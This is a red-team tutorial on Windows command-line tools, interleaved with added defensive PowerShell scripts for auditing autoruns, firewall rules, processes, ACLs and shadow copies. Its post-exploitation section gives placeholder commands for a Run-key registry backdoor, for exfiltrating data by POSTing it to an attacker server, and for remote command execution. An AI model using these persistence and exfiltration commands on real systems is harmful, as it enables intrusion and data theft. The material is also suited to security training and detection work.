As a Red Team member, you need to have a solid understanding of the command-line tools available to you on Windows systems. In this article, we will explore some of the most powerful command-line tools available for advanced Red Team members: PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin.

PowerShell

PowerShell is a command-line shell and scripting language designed specifically for Windows. It is based on the .NET Framework and provides access to a wide range of Windows administration capabilities. PowerShell is often used for automating tasks, but it is also a powerful tool for performing tasks manually.

One of the main advantages of PowerShell is that it provides access to the Windows Management Instrumentation (WMI) framework. This means that you can use PowerShell to perform a wide range of system administration tasks, such as managing processes, services, and users. Additionally, PowerShell provides access to the Registry and Active Directory, which are two critical components of Windows administration.

PowerShell is often used for post-exploitation activities, as it provides a way to execute commands and scripts on a compromised system. To use PowerShell, simply open a command prompt and type “powershell”. This starts the PowerShell shell, which looks similar to a typical command prompt but with a different prompt (“PS C:\>” instead of “C:\>”).

One of the most useful PowerShell commands for Red Team members is “Invoke-Command”. This command allows you to execute a command or script on a remote system. For example, if you have compromised a system and want to execute a PowerShell script on it, you can use the following command:

Invoke-Command -ComputerName <hostname> -ScriptBlock { <PowerShell script> }

This will execute the PowerShell script on the remote system. You need administrative credentials on the remote system, and PowerShell Remoting (WinRM) must be enabled there, for this command to work.

Another useful PowerShell command is “Get-WmiObject”. This command allows you to retrieve information from the WMI framework. For example, you can use the following command to retrieve a list of running processes on a system:

Get-WmiObject -Class Win32_Process

This will return a list of all running processes on the local system. You can use the “-ComputerName” parameter to retrieve the process list from a remote system. Note that Get-WmiObject exists only in Windows PowerShell (5.1 and earlier); in PowerShell 7 the equivalent is Get-CimInstance -ClassName Win32_Process, which also works on 5.1.
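The remote process query described above, written out as an added example rather than code from the article: it wraps Get-CimInstance (the supported replacement for Get-WmiObject) in Invoke-Command so the query runs on each target and only the result objects travel back. It assumes PowerShell Remoting is enabled on the targets, that the caller holds administrative rights there, and the host names in the usage line are placeholders.

```powershell
# Added example (not from the article): collect the running-process list from one or more
# hosts. Assumptions: WinRM/PowerShell Remoting is enabled on the targets and the caller
# has administrative rights there; the host names in the usage line are placeholders.

function Get-RemoteProcessInventory {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string[]] $ComputerName,
        [pscredential] $Credential
    )

    # The script block runs on the remote side; only its result objects cross the wire.
    $query = {
        Get-CimInstance -ClassName Win32_Process |
            Select-Object Name, ProcessId, ParentProcessId, ExecutablePath, CommandLine
    }

    $splat = @{
        ComputerName  = $ComputerName
        ScriptBlock   = $query
        ErrorAction   = 'SilentlyContinue'
        ErrorVariable = 'remoteErrors'
    }
    if ($Credential) { $splat.Credential = $Credential }

    # Hosts that are unreachable or refuse the session produce errors rather than objects,
    # so the rest of the fleet is still reported.
    Invoke-Command @splat |
        Select-Object PSComputerName, Name, ProcessId, ParentProcessId, ExecutablePath, CommandLine

    foreach ($err in $remoteErrors) {
        Write-Warning "Remote query failed: $($err.Exception.Message)"
    }
}

# Usage (placeholder host names):
Get-RemoteProcessInventory -ComputerName 'HOST01', 'HOST02' |
    Sort-Object PSComputerName, ProcessId |
    Format-Table -AutoSize
```

Invoke-Command adds the PSComputerName property to every returned object, which is what keeps the rows from different hosts apart when they are merged into one table.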

Using PowerShell for post-exploitation activities

As a Red Team member, one of your primary objectives is to maintain access to a compromised system. PowerShell can be used to perform post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.

To create a backdoor on a compromised system using PowerShell, you can use the following command:

New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "<backdoor_name>" -Value "<backdoor_path>" -PropertyType String

This command creates a new registry value under the “Run” key that points to the backdoor executable, so the backdoor is started every time a user logs on. Writing to the HKLM Run key requires administrative rights, and because it is one of the best-known persistence locations it is routinely inspected by tools such as Sysinternals Autoruns and by endpoint monitoring.

To exfiltrate data from a compromised system, you can use the following command:

Invoke-RestMethod -Uri "<server_url>" -Method Post -Body "<exfiltrated_data>"

This command sends an HTTP POST request to the server given by the “server_url” placeholder. The “exfiltrated_data” placeholder stands for the data to be exfiltrated.

To execute a command on a remote system using PowerShell, you can use the following command:

Invoke-Command -ComputerName "<remote_system>" -ScriptBlock { <command> }

This command executes the specified command on the remote system.
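The Run-key persistence mechanism described in this section, seen from the defender's side: the following added example (not code from the article) audits the standard Run and RunOnce locations and flags entries that point into user-writable directories, to a missing file, or to a binary without a valid Authenticode signature. It assumes it is run locally with administrative rights; the list of user-writable roots is this example's own choice.

```powershell
# Added example (not from the article): audit autorun registry locations and flag
# entries worth a closer look. Assumptions: run locally as an administrator; the
# "user-writable" directory list below is an assumption of this example.

$autorunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Directories an unprivileged user can write to; a persistence entry pointing here is a red flag.
$userWritableRoots = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA, "$env:SystemDrive\Users", "$env:SystemRoot\Temp")

# Properties that the registry provider adds to every Get-ItemProperty result.
$providerProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Get-ExecutableFromCommand {
    param([string] $Command)
    # A Run value may be quoted ("C:\path\app.exe" /arg) or unquoted with spaces in the path.
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    $parts = $Command -split '\s+'
    for ($i = 1; $i -le $parts.Count; $i++) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $parts[0]
}

function Get-AutorunReport {
    foreach ($key in $autorunKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-ItemProperty -LiteralPath $key
        foreach ($prop in $item.PSObject.Properties) {
            if ($providerProps -contains $prop.Name) { continue }
            $command = [string] $prop.Value
            $exe = [Environment]::ExpandEnvironmentVariables((Get-ExecutableFromCommand $command))
            $exists = Test-Path -LiteralPath $exe -PathType Leaf
            $status = if ($exists) { (Get-AuthenticodeSignature -LiteralPath $exe).Status } else { 'Missing' }
            $inUserDir = $userWritableRoots | Where-Object { $_ -and $exe.StartsWith($_, 'OrdinalIgnoreCase') }
            [pscustomobject]@{
                Key        = $key
                Name       = $prop.Name
                Command    = $command
                Executable = $exe
                Signature  = $status
                Suspicious = (-not $exists) -or ($status -ne 'Valid') -or [bool] $inUserDir
            }
        }
    }
}

Get-AutorunReport | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Unsigned but legitimate entries will show up as Suspicious, so the report is a triage list rather than a verdict; the value is that anything written by a command like the New-ItemProperty above appears here immediately, with the path it points to and whether that path is somewhere a normal user could have placed a file.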

Using PowerShell for reconnaissance

PowerShell can be used for reconnaissance activities, such as network mapping and system enumeration. Here are some examples:

To map a network using PowerShell, you can use the following command:

Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object IPAddress

This command retrieves the IP addresses of all network adapters that currently have IP enabled on the system. Together with the adapters' subnet masks and default gateways (the IPSubnet and DefaultIPGateway properties of the same class), this tells you which subnets the host is attached to, which is the starting point for mapping the network.

To enumerate the software installed on a system, you can use the following command:

Get-WmiObject -Class Win32_Product | Select-Object Name,Version

This command retrieves the names and versions of all software installed through Windows Installer. Be aware that querying Win32_Product is slow and has side effects: Windows Installer performs a consistency check of every installed MSI package, may trigger repairs, and writes MsiInstaller events to the Application event log, so the query is easy to notice in logs.
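Because of the Win32_Product side effects noted above, the usual practice is to read the installed-software inventory from the Uninstall registry keys instead. The following is an added example (not the article's code) that does this for machine-wide and current-user installs and then narrows the list to recent installations, which is what a triage analyst typically wants first. It assumes local execution and that InstallDate values, when present, use the usual yyyyMMdd format.

```powershell
# Added example (not from the article): enumerate installed software from the Uninstall
# registry keys rather than Win32_Product, which makes Windows Installer validate every
# package. Assumptions: run locally; per-user installs are read for the current user only.

function Get-InstalledSoftware {
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |            # skip components without a user-facing name
        ForEach-Object {
            # InstallDate, when present, is stored as yyyyMMdd text.
            $date = $null
            if ($_.InstallDate -match '^\d{8}$') {
                $date = [datetime]::ParseExact($_.InstallDate, 'yyyyMMdd', $null)
            }
            [pscustomobject]@{
                Name        = $_.DisplayName
                Version     = $_.DisplayVersion
                Publisher   = $_.Publisher
                InstallDate = $date
                Scope       = if ($_.PSPath -like '*HKEY_CURRENT_USER*') { 'User' } else { 'Machine' }
                Uninstall   = $_.UninstallString
            }
        } |
        Sort-Object Name
}

# Software installed in the last 30 days is the first thing to review on a suspect host.
Get-InstalledSoftware |
    Where-Object { $_.InstallDate -and $_.InstallDate -gt (Get-Date).AddDays(-30) } |
    Format-Table Name, Version, Publisher, InstallDate, Scope -AutoSize
```

The Scope column separates per-user installs (which need no administrative rights and are therefore a common place for unwanted software) from machine-wide ones; the UninstallString is kept because it usually reveals the install directory.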

Using PowerShell to manage Active Directory

PowerShell can be used to manage Active Directory, which is a critical component of Windows administration. Here are some examples:

To create a new user account in Active Directory, you can use the following command:

New-ADUser -Name "<user_name>" -GivenName "<given_name>" -Surname "<surname>" -UserPrincipalName "<user_principal_name>" -AccountPassword (ConvertTo-SecureString "<password>" -AsPlainText -Force)

This command creates a new user account with the specified name, given name, surname, and user principal name. The account password is given in place of the “password” placeholder. Note that New-ADUser creates the account disabled unless -Enabled $true is also specified.

To modify the group membership of a user account in Active Directory, you can use the following command:

Remove-ADGroupMember -Identity "<group_name>" -Members "<user_name>"

This command removes the specified user account from the specified group (add -Confirm:$false to skip the confirmation prompt). Group membership is stored on the group object, and a user's memberOf attribute is a back-link maintained by the directory, which is why Set-ADUser -Remove @{MemberOf=...} does not work and the change has to be made with Remove-ADGroupMember (or Add-ADGroupMember to add a member).

Netsh

Netsh is a command-line tool that allows you to configure and monitor network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.

One of the most useful contexts in Netsh is the firewall one. It allows you to configure the Windows Firewall, which is a critical component of network security on Windows systems. The “netsh firewall” context dates from Windows XP and Server 2003 and has been deprecated since Windows Vista; on current systems the “netsh advfirewall firewall” context is the one to use. For example, the legacy command to add an inbound rule that allows traffic on TCP port 80 is:

netsh firewall add portopening TCP 80 "HTTP"

and its equivalent on current Windows is:

netsh advfirewall firewall add rule name="HTTP" dir=in action=allow protocol=TCP localport=80

Either creates a new rule in the Windows Firewall that allows inbound traffic on TCP port 80. The rule can be inspected afterwards with netsh advfirewall firewall show rule name="HTTP".

Another useful command in Netsh is “netsh interface”. This command allows you to configure network adapters on a Windows system. For example, you can use the following command to configure the IP address and subnet mask of a network adapter:

netsh interface ip set address "Local Area Connection" static 192.168.1.10 255.255.255.0
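Firewall rules added by hand, whether with netsh or otherwise, are easy to lose track of. The following added example (not from the article) lists every enabled inbound allow rule with its protocol, ports and program using the NetSecurity cmdlets that ship with Windows 8 / Server 2012 and later, and then filters to rules that belong to no predefined rule group, which is where a rule such as the “HTTP” one above ends up. It assumes local execution with administrative rights.

```powershell
# Added example (not from the article): report enabled inbound "allow" rules in the
# Windows Firewall. Assumptions: Windows 8 / Server 2012 or later (NetSecurity module),
# run locally with administrative rights.

function Get-InboundAllowRule {
    $rules = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction Stop
    foreach ($rule in $rules) {
        # Port and program details live in separate filter objects linked to the rule.
        $port = $rule | Get-NetFirewallPortFilter
        $app  = $rule | Get-NetFirewallApplicationFilter
        [pscustomobject]@{
            Name      = $rule.DisplayName
            Profile   = $rule.Profile
            Protocol  = $port.Protocol
            LocalPort = ($port.LocalPort -join ',')
            Program   = $app.Program
            Group     = $rule.DisplayGroup
        }
    }
}

# Rules outside any predefined group were added by hand: netsh, installers, or scripts.
Get-InboundAllowRule |
    Where-Object { -not $_.Group } |
    Sort-Object Protocol, LocalPort |
    Format-Table -AutoSize
```

Drop the Where-Object filter to see the full set, including the built-in rules Windows enables per profile; the grouped view is useful for confirming that a rule opened with netsh really applies only to the profile and program intended.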

WMIC

The Windows Management Instrumentation Command-line (WMIC) tool is a powerful command-line interface to the Windows Management Instrumentation (WMI) framework. WMIC can be used to perform a wide range of system administration tasks, such as managing processes, services, and users. WMIC has been deprecated since Windows 10 version 21H1 and is an optional feature that is no longer installed by default on recent Windows 11 releases; the same queries can be run with PowerShell's Get-CimInstance.

To view a list of running processes, you can use the following command:

wmic process get Name,ProcessId,CommandLine

This command retrieves the names, process IDs, and command lines of all running processes on the system.

WMIC cannot create local user accounts: the Win32_UserAccount class does not support creating instances, so a command of the form wmic useraccount create name="<user_name>" password="<password>" fails. The built-in command that does this is:

net user "<user_name>" "<password>" /add

This command creates a new local user account with the specified name and password. The PowerShell equivalent is New-LocalUser -Name "<user_name>" -Password (ConvertTo-SecureString "<password>" -AsPlainText -Force).

Tasklist

The Tasklist command-line tool allows you to view a list of running processes on a Windows system. Tasklist is similar to the “ps” command in Unix-based operating systems.

Tasklist can be used to identify malicious processes that may be running on a compromised system.

To identify these processes, you can use the following command:

tasklist /v /fi "imagename eq <process_name>"

This command retrieves the detailed information (session, memory usage, status, user name, CPU time and window title) for every process with the specified image name. Tasklist does not show the image path or command line, so on its own it can only narrow the list: add /svc to see which services a process hosts, /m to see its loaded modules, and confirm the binary's location and signature with another tool before deciding that a process is malicious.
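The process triage this section describes needs more than tasklist prints. The following added example (not from the article) parses the CSV form of tasklist /v into objects and enriches each process with its image path, parent process, command line and Authenticode status from Win32_Process, then lists the processes whose image is not validly signed. It assumes an English-language Windows (tasklist's column headers are localized) and local execution with administrative rights so that every process's path can be read.

```powershell
# Added example (not from the article): enrich "tasklist /v" output with path, parent
# process and signature status. Assumptions: English column headers; run locally as an
# administrator so Get-CimInstance can read every process's ExecutablePath.

function Get-ProcessTriage {
    # /fo csv gives parseable output; /v adds user name, CPU time and window title.
    $tasks = tasklist /v /fo csv | ConvertFrom-Csv

    # One WMI query for all processes, indexed by PID, rather than one query per row.
    $byPid = @{}
    Get-CimInstance -ClassName Win32_Process | ForEach-Object { $byPid[[int] $_.ProcessId] = $_ }

    foreach ($t in $tasks) {
        $procId = [int] $t.PID
        $wmi    = $byPid[$procId]
        $parent = $null
        if ($wmi -and $byPid.ContainsKey([int] $wmi.ParentProcessId)) {
            $parent = $byPid[[int] $wmi.ParentProcessId].Name
        }
        $path = $wmi.ExecutablePath
        $sig  = 'Unknown'   # protected system processes may not expose a readable path
        if ($path -and (Test-Path -LiteralPath $path)) {
            $sig = (Get-AuthenticodeSignature -LiteralPath $path).Status
        }
        [pscustomobject]@{
            Name      = $t.'Image Name'
            PID       = $procId
            Parent    = $parent
            User      = $t.'User Name'
            Path      = $path
            Signature = $sig
            Command   = $wmi.CommandLine
        }
    }
}

# Processes without a valid signature, or whose path could not be read, get reviewed first.
Get-ProcessTriage |
    Where-Object { $_.Signature -ne 'Valid' } |
    Format-Table Name, PID, Parent, User, Path, Signature -AutoSize
```

The parent column is often the most telling field: a system binary with an unexpected parent, or a process whose image name matches a Windows component but whose Path is outside the Windows directory, is what this report is meant to surface.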

FSUTIL

The FSUTIL command-line tool allows you to query and manage file systems and volumes on a Windows system: volume and dirty-bit information, the USN change journal, hard links, sparse files, disk quotas and similar NTFS features. It does not create file systems (that is the job of format) and it does not manage file permissions; those are handled with icacls, as shown below.

What FSUTIL does give you is a view of a file's NTFS metadata. For example, the following command reads the file's record in the USN change journal:

fsutil usn readdata "<file_path>"

This command prints the USN journal data for the specified file: its file reference number, parent file reference number, current USN, time stamp and file attributes. It does not include the file's permissions. To view those, run icacls "<file_path>" with no options, which lists the file's access control entries.

To modify the permissions of a file, you can use the following command:

icacls "<file_path>" /grant <user_name>:<permission>

This command grants the specified user the specified permission on the file.
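Granting rights with icacls is easy to get wrong, and an over-broad grant is a weakness rather than a convenience. The following added example (not from the article) walks a directory tree with Get-Acl and reports every object where a low-privilege principal holds a right that allows changing the object, which is the check to run after permissions have been edited by hand. It assumes local execution; the set of principals treated as low privilege is this example's own choice and can be passed in.

```powershell
# Added example (not from the article): find objects under a path where low-privilege
# principals can write. Assumptions: run locally; the default principal list is an
# assumption and may need extending for a given environment.

function Find-WeakAcl {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string[]] $LowPrivPrincipals = @(
            'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
        )
    )
    # Any of these rights lets the holder change, replace or re-permission the object.
    $writeRights = [System.Security.AccessControl.FileSystemRights] `
        'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, Delete, ChangePermissions, TakeOwnership'

    Get-ChildItem -LiteralPath $Path -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $item = $_
            $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { return }
            foreach ($ace in $acl.Access) {
                $isAllow   = $ace.AccessControlType -eq 'Allow'
                $isLowPriv = $LowPrivPrincipals -contains $ace.IdentityReference.Value
                $canWrite  = ($ace.FileSystemRights -band $writeRights) -ne 0
                if ($isAllow -and $isLowPriv -and $canWrite) {
                    [pscustomobject]@{
                        Path      = $item.FullName
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                        Inherited = $ace.IsInherited
                    }
                }
            }
        }
}

# Program directories are expected to be read-only for ordinary users.
Find-WeakAcl -Path "$env:ProgramFiles" | Format-Table -AutoSize
```

The Inherited column tells you whether the weak entry was set on the object itself or flowed down from a parent; an explicit, non-inherited grant on a single file is usually the result of an icacls command like the one above and is the first thing to review.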

VSSAdmin

The VSSAdmin command-line tool allows you to manage the Volume Shadow Copy Service (VSS) on a Windows system. VSS is a built-in Windows service that allows you to create backup copies of files and system states.

VSSAdmin can be used to create and manage VSS snapshots. To create a new snapshot, you can use the following command:

vssadmin create shadow /for="<volume>"

This command creates a new VSS snapshot of the specified volume (for example /for=C:). Note that “vssadmin create shadow” is available only on Windows Server editions; client editions of Windows ship a vssadmin that can list, resize and delete shadow copies but not create them.

To list all existing VSS snapshots, you can use the following command:

vssadmin list shadows

This command retrieves a list of all VSS snapshots that have been created on the system.
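Listing shadow copies matters to a defender because their disappearance is one of the first signs that a host's recovery options have been tampered with. The following added example (not from the article) parses the output of vssadmin list shadows into objects and summarises, per volume, how many snapshots exist and how old the newest one is, so a volume with no or stale shadow copies stands out. It assumes an English-language Windows, since vssadmin's labels are localized, and administrative rights.

```powershell
# Added example (not from the article): parse "vssadmin list shadows" and summarise
# snapshot coverage per volume. Assumptions: English vssadmin output; run as an
# administrator.

function Get-ShadowCopyInfo {
    $setId = $null; $created = $null; $current = $null
    foreach ($line in (vssadmin list shadows)) {
        switch -Regex ($line) {
            '^\s*Contents of shadow copy set ID:\s*(\S+)' {
                $setId = $Matches[1]
            }
            '^\s*Contained \d+ shadow copies at creation time:\s*(.+)$' {
                # The time stamp is printed in the local date format.
                $created = [datetime]::Parse($Matches[1].Trim(), [cultureinfo]::CurrentCulture)
            }
            '^\s*Shadow Copy ID:\s*(\S+)' {
                $current = [pscustomobject]@{
                    SetId = $setId; ShadowId = $Matches[1]; Created = $created; Volume = $null; Device = $null
                }
            }
            '^\s*Original Volume:\s*\(([^)]+)\)' {
                $current.Volume = $Matches[1]
            }
            '^\s*Shadow Copy Volume:\s*(\S+)' {
                $current.Device = $Matches[1]
                $current          # the record is complete once the device path is seen
            }
        }
    }
}

function Get-ShadowCopySummary {
    Get-ShadowCopyInfo | Group-Object Volume | ForEach-Object {
        $newest = ($_.Group | Sort-Object Created -Descending | Select-Object -First 1).Created
        [pscustomobject]@{
            Volume    = $_.Name
            Snapshots = $_.Count
            NewestAge = if ($newest) { (Get-Date) - $newest } else { $null }
        }
    }
}

Get-ShadowCopySummary | Format-Table -AutoSize
```

Where text parsing is undesirable, Get-CimInstance -ClassName Win32_ShadowCopy returns the same snapshots as objects with VolumeName and InstallDate properties and works regardless of the system language; the parser above is shown because the article's tool is vssadmin itself.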

Conclusion

As a Red Team member, it is essential to have a solid understanding of the command-line tools available to you on Windows systems. PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin are some of the most powerful tools available for advanced Red Team members.

PowerShell is the most versatile and widely used tool, providing access to the Windows Management Instrumentation (WMI) framework, the Registry, and Active Directory. PowerShell is often used for post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.

Netsh is a powerful tool for configuring and monitoring network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.

WMIC is a powerful tool for managing processes, services, and users on a Windows system. WMIC provides access to the Windows Management Instrumentation (WMI) framework, allowing you to perform a wide range of system administration tasks.

Tasklist is a tool for viewing a list of running processes on a Windows system. Tasklist is particularly useful for identifying malicious processes that may be running on a compromised system.

FSUTIL is a tool for querying and managing file systems and volumes on a Windows system, from volume and USN journal information to hard links, sparse files and quotas; file permissions are managed with icacls rather than FSUTIL.

VSSAdmin is a tool for managing the Volume Shadow Copy Service (VSS) on a Windows system. VSSAdmin allows you to create and manage VSS snapshots, which are used for creating backup copies of files and system states.

By understanding how to use these tools effectively, Red Team members can perform a wide range of system administration tasks, from managing users and network settings to identifying and removing malicious processes. These tools are essential for any Red Team member who wants to be successful in their work.